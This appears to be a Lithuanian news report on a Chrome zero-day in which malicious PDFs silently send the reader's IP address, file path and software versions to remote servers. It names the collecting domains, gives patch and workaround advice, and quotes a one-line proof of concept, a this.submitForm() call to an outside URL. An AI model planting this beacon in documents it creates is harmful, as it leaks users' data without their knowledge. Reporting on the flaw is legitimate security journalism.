Išnaudoti aptikimo paslaugą „EdgeSpot“ atrado intriguojantį „ Chrome“ nulinės dienos pažeidžiamumą, išnaudojant PDF dokumentus. Dėl pažeidžiamumo užpuolikai gali rinkti neskelbtinus duomenis naudodami kenksmingus PDF dokumentus, atidarytus „Chrome“.

Kai tik auka atidaro atitinkamus PDF failus „Google Chrome“, kenksminga programa pradeda veikti fone rinkdama vartotojo duomenis.

Tada duomenys persiunčiami į nuotolinį serverį, kurį kontroliuoja įsilaužėliai. Jums gali kilti klausimas, kokius duomenis puola užpuolikai, jie nukreipia į šiuos duomenis jūsų kompiuteryje:

• IP adresas
• Visas PDF failo kelias sistemoje
• OS ir „Chrome“ versijos

Saugokitės kenkėjiškų programų PDF failų

Galite nustebti sužinoję, kad nieko nevyksta, kai „Adobe Reader“ yra naudojamas atidaryti PDF failus. Be to, HTTP POST užklausos yra naudojamos duomenims perduoti į nuotolinius serverius be jokio vartotojo įsikišimo.

Ekspertai pastebėjo, kad duomenis gauna viena iš dviejų sričių readnotifycom arba burpcollaboratornet.

Galite įsivaizduoti išpuolio intensyvumą įvertinę tai, kad dauguma antivirusinės programinės įrangos nesugeba aptikti „EdgeSpot“ aptiktų pavyzdžių.

Ekspertai atskleidžia, kad užpuolikai naudoja „this.submitForm ()“ PDF „Javascript“ API rinkdami neskelbtiną vartotojų informaciją.

Išbandėme jį naudodami minimalų „PoC“, paprastas API skambutis, toks kaip „this.submitForm ('http://google.com/test')“ privers „Google Chrome“ siųsti asmeninius duomenis į google.com.

Ekspertai iš tikrųjų išsiaiškino, kad šią „Chrome“ klaidą išnaudojo du atskiri kenksmingų PDF failų rinkiniai. Abu jie buvo išplatinti atitinkamai 2017 m. Spalio mėn. Ir 2018 m. Rugsėjo mėn.

Pažymėtina, kad užpuolikai gali panaudoti surinktus duomenis ateityje norėdami tikslinti išpuolius. Ataskaitose teigiama, kad pirmoji failų partija buvo sudaryta naudojant „ReadNotify“ PDF sekimo paslaugą.

Vartotojai gali naudotis šia paslauga norėdami sekti vartotojo nuomones. „EdgeSpot“ nesidalijo jokios informacijos apie antrojo PDF failų rinkinio pobūdį.

Kaip likti apsaugotam

Išnaudojimo aptikimo paslauga „EdgeSpot“ norėjo įspėti „Chrome“ vartotojus apie galimą riziką, nes tikimasi, kad pataisymas nebus išleistas artimiausiu metu.

„EdgeSpot“ praėjusiais metais pranešė „Google“ apie pažeidžiamumą, o bendrovė pažadėjo išleisti pataisą balandžio pabaigoje. H

Vis dėlto galite apsvarstyti galimybę naudoti laikiną problemos sprendimo būdą, jei lokaliai peržiūrite gautus PDF dokumentus naudodami alternatyvią PDF skaitymo programą.

Taip pat galite atidaryti savo PDF dokumentus naudodami „Chrome“, atjungdami savo sistemas nuo interneto. Tuo tarpu galite laukti „Chrome 74“ atnaujinimo, kuris turėtų būti pradėtas naudoti balandžio 23 d.